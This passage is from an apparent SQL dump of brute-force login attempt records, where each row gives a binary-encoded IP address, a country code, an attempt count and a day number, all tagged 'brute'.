18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��@om�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��@om�','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��@om�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��@om�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~ ','US',2,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~ ','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~ ','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~ ','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�D�','NL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�FW','NL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�\0�','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�\0�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��@��','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��@��','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�5?','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�:�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�N�','NL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�N�','NL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�N�','NL',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�N�','NL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��@��','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��@��','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��@��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��@��','US',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��Bt�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��Bt�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�S','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��B��','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��B��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�|','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��B!�l','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��B!�l','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��B!�~','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��B!�~','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��B!�~','US',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��BF��','CA',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��Bs�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��Bs�','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��Bs�','US',4,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��Bs�','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��Bs�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�h','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��B��','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��B��','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��C �','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',2,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�2','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�,6','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��C͘','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��C͘','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��T','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��T','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��Cܹ','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��Cޘ�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��DB�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��DF�\"','US',3,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�\n9','NL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�\n9','NL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�D�','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�D�','DE',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�D�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�\\*','IN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�q?','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�q?','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��D���','CA',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��D���','CA',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��D��l','CA',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��D��U','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��E$^�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��E1��','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��E���','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��E���','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��E���','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��x','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��E���','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��E���','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��|','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��|','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��p','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��p','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��p','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��x','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��}','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��}','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�φ','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�φ','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��F$R','PM',2,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��H\n�k','CA',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��H\"\"�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�%�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�%�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�)�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*-','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��J�g�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��J�g�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��J�g�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��JЈ�','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��JЈ�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��JЈ�','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw�d','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw�d','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw�d','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��M��)','NL',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��M�~�','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��N.L�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��N/:�','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��N/ɏ','DE',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��N/ɏ','DE',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��N/ɏ','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��N/ɏ','DE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�Q�','BG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�Q�','BG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�Q�','BG',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�Q�','BG',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�X�','HU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�/�','BG',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�$b','IR',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�(�','IR',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�(�','IR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�(�','IR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�(�','IR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�dM','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',3,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��O���','RU',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��O�Uw','IR',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��PP��','UZ',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��PP��','UZ',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��PQ\0�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��P�Ҕ','NL',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��P�Ҕ','NL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��\Z','PT',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��P�','IL',2,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��P�i','GB',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��P�i','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��P�i','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��P�i','GB',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��','DZ',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��o','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��o','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��o','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��QDD�','CN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��QDD�','CN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��QEˣ','CN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��QEˣ','CN',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��QEˣ','CN',2,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��QF�','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4\Z','IT',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4\Z','IT',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4r','IT',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4r','IT',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4r','IT',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��Q���','FR',1,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0��Q���','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��R@�','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��R@�','FR',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��R@�','FR',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�5�','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�5�','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�,�','RU',2,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�,�','RU',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�,�','RU',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�,�','RU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�,�','RU',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�,�','RU',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�,�','RU',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��R��','NL',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��Rʬ�','RU',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��Rʬ�','RU',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��Rʬ�','RU',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�20','ES',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�71','ES',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�v�','ES',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0��S�\0','AM',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��S�\0','AM',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��T��','SI',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��T��','SI',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��T��','SI',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��UX�','NL',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��UX�','NL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��UX�','NL',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ue�','LV',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ue�','LV',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��U���','PL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��U���','PL',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��U�,','FR',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��Wb��','FR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��Wk�6','IR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��Wk�6','IR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��XVh\n','CZ',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc�/','DE',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc�/','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc��','DE',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc��','DE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc��','DE',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��X�$�','IR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��X�$�','IR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��X�$�','IR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��X�$�','IR',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��X�%1','IR',3,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��X�%1','IR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��X�=�','DE',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y`Z}','IT',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y`Z}','IT',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y`Z}','IT',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y�A�','GB',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y��','DE',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y���','TR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y���','TR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��[���','ES',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��[���','ES',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�ɤ','FR',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�ɤ','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��[���','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��[���','FR',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��','BG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��','PL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��','PL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�(n','UA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�n�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�n�','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�o}','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�..','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��[ͯ#','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��[ͯ#','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��','UA',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��\r','UA',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��','UA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��O','UA',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��R','UA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�ȉ','UA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�ȉ','UA',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�ȷ','UA',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��','UA',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��','UA',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��Y','UA',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�F�','RU',2,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��[','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��[','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\5`t','RU',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\5x�','RU',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\̆�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\̆�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\̆�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\̆�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\̈�','US',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��]Y��','TR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��]Y��','TR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo\"','GB',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo\"','GB',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo\"','GB',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo\"','GB',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo6','GB',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo6','GB',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo6','GB',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo6','GB',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo6','GB',2,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo6','GB',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qod','GB',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qod','GB',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qod','GB',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo�','GB',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo�','GB',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo�','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��]q�v','IR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��]r��','GB',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��]r��','GB',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��]r��','GB',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��]�xr','RU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��]�xr','RU',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��]�xr','RU',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��]��','AT',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��]��','AT',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��]��','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��^>�','FR',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��^Vc','ES',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��^�g','FR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��^�N�','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�','DE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�)','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�|','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�|','DE',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�+�','FR',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�+�','FR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�+�','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��&','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��_���','DE',3,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��_���','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��_կ�','RU',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��_կ�','RU',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�*�','FI',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�� ','FI',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�� ','FI',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��[','FI',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��[','FI',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��[','FI',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��[','FI',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��[','FI',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��','FI',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��','FI',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��','FI',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��','FI',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��`>w','CN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��`>w','CN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��`}��','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��`}��','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��`}��','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��e \Z�','HK',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��e >�','HK',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��e >�','HK',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��e >�','HK',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��e ��','HK',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��e 